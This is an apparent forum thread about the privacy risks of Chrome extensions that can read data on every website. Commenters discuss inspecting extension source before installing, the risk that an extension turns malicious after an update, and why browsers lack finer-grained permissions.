
Chrome Extension says “it can read my data in all the website I visit” - rammy1234
Will these extensions can read my passwords ? what do you all feel about this. How safe are any chrome extensions
======
chatmasta
You can read the source and see for yourself. I use an extension called CRX
viewer [0] to unpack extensions and view their source before installing them.
When you’re in the extensions store you just click the button and it shows you
the source.

When inspecting the source I grep for http/network calls and anything that
looks suspicious. Most extensions are fairly simple and it’s easy to see when
they’re not malicious.

Problem is, those extensions can update their source at any time. Ownership
can change. A good extension can turn malicious while you aren’t looking. For
that reason, if I really need an extension with “all website” permissions, I
make sure to disable it and only enable it when I use it.

The only long running extension with those permissions on my machine is
uBlock.

[0] [https://chrome.google.com/webstore/detail/chrome-
extension-s...](https://chrome.google.com/webstore/detail/chrome-extension-
source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en)

~~~
rammy1234
why an extension needs all website permission, even then can't google provide
a mechanism to avoid password fields out of scope of access. Is there a reason
why it is not done ? technically speaking.

~~~
chatmasta
Lazy developers, that’s all there is to it.

And of course some extensions do need access to the whole page, including
password fields. For example a password manager obviously needs access (though
it shouldn’t need to read the password field, only write to it).

As to why it’s not possible to have super granular permissions (i.e.
restricting to certain elements on the page) — that would break the whole
extension model, because scripts you inject into the page would have to
operate on a “shadow DOM” of sorts. Also properly sand boxing within a single
DOM would be porously impossible.

Now that I type it out though, I could see how maybe it would be possible to
construct a restricted, parallel DOM for an extension to interact with... but
I really don’t think the complexity is worth changing the status quo.

